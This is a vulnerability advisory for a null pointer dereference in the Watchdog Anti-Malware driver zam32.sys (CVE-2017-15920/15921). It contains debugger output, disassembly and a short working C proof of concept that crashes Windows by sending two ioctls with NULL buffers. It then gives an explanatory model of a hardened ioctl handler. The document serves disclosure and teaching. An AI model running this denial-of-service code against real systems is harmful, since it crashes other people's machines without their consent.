/*
Exploit Title     - Watchdog Development Anti-Malware/Online Security Pro Null Pointer Dereference
Date              - 26th October 2017
Discovered by     - Parvez Anwar (@parvezghh)
Vendor Homepage   - https://www.watchdogdevelopment.com/
Tested Version    - 2.74.186.150
Driver Version    - 2.21.63 - zam32.sys
Tested on OS      - 32bit Windows 7 SP1
CVE IDs           - CVE-2017-15920 and CVE-2017-15921
Vendor fix url    - Will be fixed in a future release
Fixed Version     - n/a
Fixed driver ver  - n/a

A null pointer dereference vulnerability is triggered when sending an operation to ioctls 0x80002010 or 0x80002054.
This is due to the input buffer being NULL or the input buffer size being 0, as neither is validated.

kd> dt nt!_irp @esi -r
   +0x000 Type             : 0n6
   +0x002 Size             : 0x94
   +0x004 MdlAddress       : (null)
   +0x008 Flags            : 0x60000
   +0x00c AssociatedIrp    : <unnamed-tag>
      +0x000 MasterIrp        : (null)
      +0x000 IrpCount         : 0n0
      +0x000 SystemBuffer     : (null)      <----------- null pointer


0x80002010 ---------- CVE-2017-15921

kd> r
eax=00000000 ebx=80002010 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001
eip=9087cd9f esp=a7a80ab8 ebp=a7a80ab8 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000202
zam32+0xdd9f:
9087cd9f ff30            push    dword ptr [eax]      ds:0023:00000000=????????

.text:90AD9104                 push    offset aIoctl_register ; "IOCTL_REGISTER_PROCESS"
.text:90AD9109                 push    0
.text:90AD910B                 push    edx             ; Pointer to "DeviceIoControlHandler" string
.text:90AD910C                 push    208h
.text:90AD9111                 push    offset aMain_c
.text:90AD9116                 push    1
.text:90AD9118                 call    sub_90AD3ADA
.text:90AD911D                 add     esp, 18h
.text:90AD9120                 push    esi             ; esi is null, becomes arg_0; otherwise would point to our input "SystemBuffer"
.text:90AD9121                 call    sub_90AD8D90

.text:90AD8D90 sub_90AD8D90    proc near
.text:90AD8D90
.text:90AD8D90 arg_0           = dword ptr  8
.text:90AD8D90
.text:90AD8D90                 push    ebp
.text:90AD8D91                 mov     ebp, esp
.text:90AD8D93                 call    sub_90AD414A
.text:90AD8D98                 test    eax, eax
.text:90AD8D9A                 jz      short loc_90AD8DA6
.text:90AD8D9C                 mov     eax, [ebp+arg_0] ; Null pointer dereference
.text:90AD8D9F                 push    dword ptr [eax] ; BSOD !!!!
.text:90AD8DA1                 call    sub_90AD428C
.text:90AD8DA6
.text:90AD8DA6 loc_90AD8DA6:
.text:90AD8DA6                 pop     ebp
.text:90AD8DA7                 retn    4
.text:90AD8DA7 sub_90AD8D90    endp
.text:90AD8DA7
.text:90AD8DAA


0x80002054 ---------- CVE-2017-15920

kd> r
eax=861e8320 ebx=80002054 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001
eip=9087d41a esp=99f4eaac ebp=99f4eadc iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000246
zam32+0xe41a:
9087d41a c7061e010000    mov     dword ptr [esi],11Eh ds:0023:00000000=????????

.text:90AD9401                 push    offset aIoctl_get_driv ; IOCTL_GET_DRIVER_PROTOCOL
.text:90AD9406                 push    0
.text:90AD9408                 push    edx
.text:90AD9409                 push    2A3h
.text:90AD940E                 push    offset aMain_c
.text:90AD9413                 push    1
.text:90AD9415                 call    sub_90AD3ADA
.text:90AD941A                 mov     dword ptr [esi], 11Eh ; BSOD !!!! Null pointer dereference
.text:90AD941A                                               ; otherwise would point to our input "SystemBuffer"
.text:90AD9420                 jmp     loc_90AD9622
*/

#include <stdio.h>
#include <conio.h>      /* getch() */
#include <windows.h>

int main(int argc, char *argv[])
{
    HANDLE hDevice;
    char   devhandle[MAX_PATH];
    DWORD  dwRetBytes = 0;

    /* Device object exposed by zam32.sys */
    sprintf(devhandle, "\\\\.\\%s", "zemanaantimalware");
    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);

    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Open %s device failed\n\n", devhandle);
        return -1;
    }
    else
    {
        printf("\n[+] Open %s device successful", devhandle);
    }

    printf("\n[~] Press any key to continue . . .");
    getch();

    /* NULL input/output buffers with zero lengths: SystemBuffer stays NULL and the
       driver dereferences it. Swap the commented line in to hit the other ioctl. */
    DeviceIoControl(hDevice, 0x80002010, NULL, 0, NULL, 0, &dwRetBytes, NULL);
    //DeviceIoControl(hDevice, 0x80002054, NULL, 0, NULL, 0, &dwRetBytes, NULL);

    printf("\n[+] DoSed\n\n");
    CloseHandle(hDevice);
    return 0;
}
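The root cause described above is a dispatch routine that touches `Irp->AssociatedIrp.SystemBuffer` without checking it or the caller-supplied lengths. Both control codes have 0 in their low two bits, i.e. METHOD_BUFFERED, so input and output share `SystemBuffer`, and the I/O manager leaves that pointer NULL when both lengths are zero, which is exactly the state the `dt nt!_irp` dump shows. The following is an added, user-mode model of what a hardened handler for these two ioctls should do; it is not the vendor's driver code and not derived from it. The kernel types, status values and IRP fields are constructed stand-ins (not ntddk.h), `simulate_ioctl` mimics only the buffering rule of the I/O manager, and the one-DWORD input layout assumed for 0x80002010 follows from the `push dword ptr [eax]` in the disassembly; the page does not say what that DWORD means.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-ins for kernel types/constants (this is model code, not ntddk.h). */
typedef int32_t NTSTATUS_T;
#define STATUS_SUCCESS_T           ((NTSTATUS_T)0x00000000)
#define STATUS_INVALID_PARAMETER_T ((NTSTATUS_T)0xC000000D)
#define STATUS_BUFFER_TOO_SMALL_T  ((NTSTATUS_T)0xC0000023)

#define IOCTL_REGISTER_PROCESS     0x80002010u  /* control codes from the advisory */
#define IOCTL_GET_DRIVER_PROTOCOL  0x80002054u
#define METHOD_BUFFERED_T          0u
#define DRIVER_PROTOCOL_VALUE      0x11Eu       /* the DWORD the driver stores: mov [esi], 11Eh */

/* Only the IRP / IO_STACK_LOCATION fields a DeviceIoControl dispatch routine reads. */
typedef struct {
    void    *SystemBuffer;        /* Irp->AssociatedIrp.SystemBuffer */
    uint32_t IoControlCode;       /* IrpSp->Parameters.DeviceIoControl.IoControlCode */
    uint32_t InputBufferLength;   /* IrpSp->Parameters.DeviceIoControl.InputBufferLength */
    uint32_t OutputBufferLength;  /* IrpSp->Parameters.DeviceIoControl.OutputBufferLength */
    uint32_t Information;         /* Irp->IoStatus.Information (bytes written) */
} model_irp_t;

/* Assumed input layout for IOCTL_REGISTER_PROCESS: one DWORD read from SystemBuffer. */
typedef struct { uint32_t Value; } register_process_in_t;

/* The transfer method is the low two bits of a CTL_CODE. */
uint32_t ctl_method(uint32_t code) { return code & 3u; }

/* Hardened dispatch: every access to SystemBuffer is preceded by a NULL check and a
   length check against the structure that is actually read or written. */
NTSTATUS_T handle_ioctl(model_irp_t *irp)
{
    if (irp == NULL)
        return STATUS_INVALID_PARAMETER_T;
    irp->Information = 0;
    if (ctl_method(irp->IoControlCode) != METHOD_BUFFERED_T)
        return STATUS_INVALID_PARAMETER_T;

    switch (irp->IoControlCode) {
    case IOCTL_REGISTER_PROCESS: {
        if (irp->SystemBuffer == NULL ||
            irp->InputBufferLength < sizeof(register_process_in_t))
            return STATUS_BUFFER_TOO_SMALL_T;       /* instead of push dword ptr [NULL] */
        const register_process_in_t *in = (const register_process_in_t *)irp->SystemBuffer;
        (void)in->Value;                             /* safe to consume from here on */
        return STATUS_SUCCESS_T;
    }
    case IOCTL_GET_DRIVER_PROTOCOL: {
        uint32_t v = DRIVER_PROTOCOL_VALUE;
        if (irp->SystemBuffer == NULL ||
            irp->OutputBufferLength < sizeof(uint32_t))
            return STATUS_BUFFER_TOO_SMALL_T;       /* instead of mov dword ptr [NULL], 11Eh */
        memcpy(irp->SystemBuffer, &v, sizeof v);
        irp->Information = sizeof v;
        return STATUS_SUCCESS_T;
    }
    default:
        return STATUS_INVALID_PARAMETER_T;
    }
}

/* Models the METHOD_BUFFERED rule: SystemBuffer is one buffer of max(inlen, outlen)
   bytes, or NULL when both are zero. On return *out gets the first DWORD written, if any. */
NTSTATUS_T simulate_ioctl(uint32_t code, const void *in, uint32_t inlen,
                          uint32_t outlen, uint32_t *out)
{
    uint8_t     shared[64] = {0};
    uint32_t    len = inlen > outlen ? inlen : outlen;
    model_irp_t irp = {0};
    if (len > sizeof shared)
        return STATUS_INVALID_PARAMETER_T;
    if (len != 0) {
        if (in != NULL && inlen != 0)
            memcpy(shared, in, inlen);
        irp.SystemBuffer = shared;
    }
    irp.IoControlCode = code;
    irp.InputBufferLength = inlen;
    irp.OutputBufferLength = outlen;
    NTSTATUS_T st = handle_ioctl(&irp);
    if (out != NULL && irp.Information >= sizeof(uint32_t))
        memcpy(out, shared, sizeof(uint32_t));
    return st;
}

/* Well-formed IOCTL_GET_DRIVER_PROTOCOL request; returns the DWORD written, 0 if rejected. */
uint32_t query_driver_protocol(void)
{
    uint32_t v = 0;
    return simulate_ioctl(IOCTL_GET_DRIVER_PROTOCOL, NULL, 0, sizeof v, &v) == STATUS_SUCCESS_T ? v : 0;
}

int main(void)
{
    uint32_t pid = 1234;   /* constructed sample input */
    /* The PoC's call shape (NULL buffers, zero lengths) is now rejected without a dereference. */
    printf("0x80002010 NULL/0 -> 0x%08X\n", (unsigned)simulate_ioctl(IOCTL_REGISTER_PROCESS, NULL, 0, 0, NULL));
    printf("0x80002054 NULL/0 -> 0x%08X\n", (unsigned)simulate_ioctl(IOCTL_GET_DRIVER_PROTOCOL, NULL, 0, 0, NULL));
    printf("0x80002010 4-byte -> 0x%08X\n", (unsigned)simulate_ioctl(IOCTL_REGISTER_PROCESS, &pid, sizeof pid, 0, NULL));
    printf("0x80002054 out=4  -> value 0x%X\n", query_driver_protocol());
    return 0;
}
```

The check that matters is the one against the size of the structure the code actually touches, not merely "length != 0": a 2-byte input to 0x80002010 is rejected just like a NULL one, because a DWORD read would run past it. In a real driver the same two checks go in front of every `SystemBuffer` access, and probing is unnecessary for METHOD_BUFFERED because the I/O manager has already copied the caller's data into kernel memory.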